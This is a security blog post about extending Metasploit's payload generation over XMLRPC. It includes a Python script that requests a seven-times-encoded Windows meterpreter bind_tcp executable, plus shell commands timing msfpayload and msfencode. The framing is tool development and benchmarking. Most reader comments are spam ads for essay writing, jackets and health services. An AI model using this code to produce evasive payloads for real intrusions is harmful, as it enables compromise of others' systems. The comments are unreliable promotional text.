Blog.HappyPacket.net

Security Notes, News, and Thoughts

Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.


import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])




Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:


[email protected]:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit




It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

12 comments:

Unknown said...

it awesome artical.i found it so educational.

Eva E. Murphy said...

I think, my friend has shared this post by mistake because I asked him to find someone who can Do My Dissertation Uk
format and I do not know why he has shared this post with me but I must say, you have posted very nice information which can be beneficial for many students.

William Woodruff said...

My last week was spent learning how to generate payloads inside Metasploit, but still, I had some questions, and I was looking for their answers. After reading your blog, I identified an error that caused me to fail. British Writings

Unknown said...
This comment has been removed by the author.
Unknown said...

Being a blog writer is tough you have to be genuine about everything because your fans believe you blindly. This is a lot of pressure. I follow a blogger and she posts reviews about academic online services. I recently took this Marketing thesis help on her recommendation and believe me it turned out to be the best decision. Your authenticity is what gets you, followers!

Sarah gough said...

it awesome artical.i found it so educational. and every ones know that your writing style its adorable i am designer i have best collection of shearling leather jackets for men in USA

David Portal said...

Leather Jackets for men are a great way to add a touch of style to your look and they can also keep you warm in cooler weather.

john stan said...

it awesome artical.i found it so educational. and every ones know that your writing style its adorable by the way i am agent in save driver company we provide best dubai safe driver.

paytotakemyclassonline said...

I think it's a great idea! I would love to be able to pay for grades in online class. It would incentive me to do my best and get good grades.

Kadine Alves said...

I think it's a fantastic plan! I love reading your article keep up with the good work. It is such an amazing blog. Take my hesi exam for me

Unknown said...

I found your post on "Fun with Metasploit payload generation" quite interesting. However, as a healthcare enthusiast, I would like to suggest that your readers check out Meri Sehat.pk - an online healthcare services provider that offers a variety of services, including an online BP check app. This app is very helpful for people who want to monitor their blood pressure at home and keep track of their health. It's always great to see technology being used for the betterment of our health, and I believe Meri Sehat.pk is doing a fantastic job in that regard.

Alina Aimes said...

I have read your post but I can't understand to your post, I was busy with cheap dissertation writing services